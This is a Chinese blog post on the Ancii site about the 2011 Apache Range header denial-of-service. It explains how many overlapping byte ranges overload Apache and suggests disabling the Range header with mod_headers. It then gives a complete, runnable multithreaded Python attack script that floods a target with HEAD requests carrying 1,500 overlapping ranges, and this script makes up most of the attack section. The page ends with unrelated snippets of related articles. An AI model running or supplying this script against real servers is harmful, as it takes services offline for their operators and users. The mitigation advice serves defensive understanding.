安科网

Apache Range Header DOS攻击

bxqybxqy

bxqybxqy

2011-10-08

关注 关注

Apache Range Header DOS攻击

背景

http://lwn.net/Articles/456268/

Http协议之ByteRange

http://www.ietf.org/rfc/rfc2616.txt(14.35章节)

14.35   Range ....................................................138
   14.35.1    Byte Ranges ...........................................138
   14.35.2    Range Retrieval Requests ..............................139

Apache演示

1. 新建内容为abcdefghijk的txt页面
2. 不带Byte Range Header的请求,请看:


3.带Byte Range Header的请求,请看:



理论上,一旦带上N个Range分片,Apache单次请求压力就是之前的N倍(实际少于N),需要做大量的运算和字符串处理。故构建无穷的分片,单机DOS攻击,就能搞垮Apache Server。
解决方案 1. 等待Apache修复,不过Byte Range是规范要求的,不能算是真正意义上的BUG,不知道会如何修复这个问题 2. 对于不是下载站点来说,建议禁用Byte Range,具体做法: 2.1 安装mod_headers模块 2.2 配置文件加上: RequestHeader unset Range
最后附上一个攻击脚本,做演示
 1 # encoding:utf8 2 #!/usr/bin/env python 3 import socket 4 import threading 5 import sys 6  7 headers = ''' 8 HEAD / HTTP/1.1 9 Host: %s10 Range: bytes=%s11 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.812 13 '''14 15 #fragment count and loop count16 COUNT = 150017 #concurrent count18 PARALLEL = 5019 PORT = 8020 21 def req(server):22     try:23         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)24         s.connect((server, PORT))25         s.send(headers % (server, fragment(COUNT)))26         s.close()27     except:28         print 'Server Seems Weak. Please Stop.'29 30 def fragment(n):31     ret = ''32     for i in xrange(n):33         if i == 0:34             ret = ret + '0-' + str(i + 1)35         else:36             ret = ret + ',0-' + str(i + 1)37     return ret38 39 def run(server):40     for _ in xrange(COUNT):41         req(server)42 43 if len(sys.argv) != 2:44     print 'killer.py $server'45     sys.exit(0)46 47 #run48 srv = sys.argv[1]49 for _ in xrange(PARALLEL):50     threading.Thread(target=run, args=(srv,)).start()51

header dos攻击 apache

bxqybxqy

bxqybxqy

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

ajax请求添加自定义header参数代码

我就废话不多说了,大家还是直接看代码吧~并且不会因为增加自定义请求头header,而引起预检查请求;Access-Control-Allow-Headers 表示能接受的http头部,别忘了加入你自己发明创造的头部。如果是OPTION返回空,设置返回码为2

kentrl 2020-11-10

nginx配置上线vue和go-admin

listen 80;server_name ytt.haimait.com;index index.html index.htm;proxy_set_header Host $http_host;proxy_set_header

咻咻ing 2020-07-04

less学习---less的继承(extend)

上篇主要讲述了less的变量的基本使用,本篇我们来讲解下less的一个常用规则,那就是嵌套了,这个使你在使用css的时候能够用起来非常方便和爽。.page-header {  background-color:#666666;  color:#000;  

wghou 2020-06-16

php判断远程文件是否存在

php判断本地文件是否存在可以简单的使用is_file就可以实现。但是在部分情况下会检测远程文件是否存在,实现方式如下

JF0 2020-06-16

HTTP 之 Authorization

服务器发现配置了 http auth,于是检查 request 里面有没有 "Authorization" 的 http header. 如果有,则判断 Authorization 里面的内容是否在用户列表里面,Authorizatio

zkwgpp 2020-06-14

Jmeter http接口添加header和cookie

HTTP信息头管理器在Jmeter的使用过程中起着很重要的作用,通常我们在通过Jmeter向服务器发送http请求的时候,往往后端需要一些验证信息,比如说web服务器需要带过去cookie给服务器进行验证,一般就是放在请求头中,因为对于此类请求,在Jmet

xiechao000 2020-05-18

websocket使用nginx代理后连接频繁打开和关闭

前几天开发了一个功能,使用websocket向前台发送消息,与前端联调时一切正常,但是发布到环境出现如下报错:。发现404,无法找到连接,突然想到环境上是走nginx代理的,应该是nginx没有配置代理,于是nginx配置如下:。上面的配置可以使代理端口支

woniyu 2020-05-14

Nginx 设置cors跨域

在我们的开发中,经常遇到跨域,这个时候,可以通过cors来解决。在web服务器上进行设置cors 跨域,这样就不必改动代码。add_header ‘Access-Control-Allow-Methods‘ ‘GET, POST, OPTIONS‘;# C

ysmh00 2020-05-14

Nginx session丢失问题处理解决方法

在用nginx的反向代理tomcat的路径中,可能会出现session丢失问题。每发送一次请求 JESSIONID 都会发生改变,说明上一次形成的session丢失,从而创建新的session。这种情况,指定了tomcat的文件夹,不仅仅是一个端口监听,会

0与的世界 2020-04-28

谷歌浏览器chrome安装插件报\"程序包无效: CRX_HEADER_INVALID\"错误

今天参加需求评审,看到原来可以谷歌浏览器查看Axure原型文件,真是只有想不到,没有做不到。于是百度“谷歌浏览器如何安装Axure RP扩展程序”,发现不能直接通过谷歌网上应用店安装。于是,下载了Axure RP扩展程序,结果安装时报"程序包无效

worldkun 2020-05-10

[nginx][http] nginx关于http header的设置

nginx关于http header有以下三个配置。用来对http request header进行修改。修改的方法是,追加的在header的最前面。功能与add_header相同,区别是添加在header的结尾。另外, 如果有多个名字相同的header存

carolAnn 2020-04-20

前端样式css学习记录(混合记录js/jq+html+bootstrap)

按钮绑定的click事件如下:。/*基本样式*/header .navBtn{width:30px; margin-right:50px; height:30px; overflow:hidden; position:relative; margin-to

zengni 2020-02-29

nginx websocket代理配置

default upgrade;‘‘ close;server 127.0.0.1:9002;listen 80;server_name localhost;rewrite ^/linecloud/socket(.*)$ /$1 break;

hygbuaa 2020-02-26

HTTP 413错误解决方法

<span style="color:#ff0000;">Failed to load resource: the server responded with a status of 413 </span>.  

zhaolisha 2020-02-24

【nginx】配置

server { listen 80; server_name ××××.com; access_log /×××/×××/nginx/log/access.log; error_log /×××/×

咻咻ing 2020-02-02

php常用head信息

header; //设置地址被永久的重定向 301. header; //告诉浏览器最后一次修改时间。header; //告诉浏览器文档内容没有发生改变

JF0 2020-01-31

HTTP请求的header头解析

如果服务器无法返回text/html类型的数据,服务器应该返回一个406错误。当用户再次请求该资源时,将在HTTPRequest中加入If-None-Match信息。如果服务器验证资源的ETag没有改变,将返回一个304状态告诉客户端使用本地缓存文件。

OwenJi 2020-01-17

webpack初探

这样改造之后,使得代码更具有维护性,关于header的代码都可以在header.js中进行维护,相比全部摞在一起,还是方便了不少。在html中引入多个js文件,页面多了http请求,导致页面加载速度变慢;不能在index.js中看出相应的类对应的文件是哪一

webfullStack 2020-01-10

php一句代码让http跳转https

isset || $_SERVER[‘HTTPS‘] == ‘off‘){

Nicolase 2020-01-02

spring boot 1.x nginx前置https配置及注意点

首先参考nginx配置https并强制http自动跳转到https配置nginx的https证书。其他就无需特殊处理可以了,websocket也无须特殊处理。

houjinkai 2020-01-01
bxqybxqy

bxqybxqy

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号